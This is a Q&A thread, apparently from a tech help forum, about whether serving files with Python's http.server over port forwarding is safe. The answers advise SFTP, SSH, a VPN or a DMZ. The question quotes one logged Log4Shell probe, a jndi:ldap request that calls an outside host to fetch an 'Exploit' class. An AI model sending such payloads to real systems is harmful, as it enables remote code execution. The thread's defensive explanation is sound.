Is it OK to host a Python's http.server accessible from the Internet?

python http

Depends on what files you are hosting and what authentication,authorization or general defense mechanism you are using currently (Probably none as I understand). If the files are sensitive just serving them using a simple HTTP server without any authentication/protection probably not the best idea.

About that jndi log you see:

  • The request you see as GET /${jndi:ldap://185.246.87.50:1389/Exploit} is an exploit request to download malicious Java class as far as I know.
  • This is a fairly new exploit method seen in the wild. Mostly targeting logging mechanism of applications.
  • It's caused by an Java library (log4j) is exploited for RCE (Remote Code Execution) or for patched version DOS (Denial of Service).
  • Since Python Simple HTTP Server is running solely on Python code (as far as I know, again.) you got nothing to worry about. (Unless you are also logging HTTP requests using different applications or methods.)
  • CVE-2021-45046 and CVE-2021-45105 if you want more info about it, just Google it.

My humble advice:

  1. Since you are currently doing port forwarding on your network, you can simply use an SFTP (Secure FTP) service for your file needs. Or can just SCP.
  2. Using a DMZ would serve you well to. What is a DMZ?
  3. If you serve anything on the internet (Doesn't matter the service or port you are using), you will be detected and scanned. No worries if you are prepared for such thing (Updates, knowing what is exposed, what version is it, etc.).
  4. Mass scans always happen. (Mostly when a new exploit is publicly disclosed.) You can prevent this situation using different methods. WAF's (Web Application Firewall) and such. Please be aware WAF's can be bypassed on most situations.

What I would do?

  • I'm not a fan of running HTTP servers 7/24 for personal needs. I would simply use a SFTP server or cloud if it fits your needs. Very brief info for you about FTP & SFTP.

I'm running python3 -m http.server 8080 together with port forwarding to have access to files from my laptop from anywhere.

Which probably means everyone else also has access to those files... so I hope there's nothing in them you don't want other people to read.

But there appeared random connections and a particular weird line: GET /${jndi:ldap://185.246.87.50:1389/Exploit}.

The weird line means people are scanning for the log4j vulnerability (google), but as you have a Python server and not Java, that one shouldn't worry you. (The other random connections should, however).

If not, then is there any way that I can make it safe? Maybe something like a login password?

If you do not know how to make it safe (and following random recipes you find on the internet will never make it safe if you don't know what you are doing), and if you need it to be safe, I recommend to take the server offline right now. Instead, start using something else (e.g. a VPN, or ssh).

Related

Is YouTube a good way to store personal videos on the long run?
How to shutdown pgAdmin 4 from the command line on Windows?
How do I type the Spanish inverted question mark in Emacs?
How can I convert a DavkaWriter hebrew document to Word?
Why 7z compression speed and CPU usage are low
Windows 7 Default Aero for New Users
Powershell: Using .Split on Filename functioning differently based on filename capitalization
How do I negate a test with regular expressions in a bash script?
How to mark a class as Deprecated? [duplicate]
I want to use CASE statement to update some records in sql server 2005
How can I list the contents of a directory in Python?
Visual Studio Clicking Find Results Opens Code in Wrong Window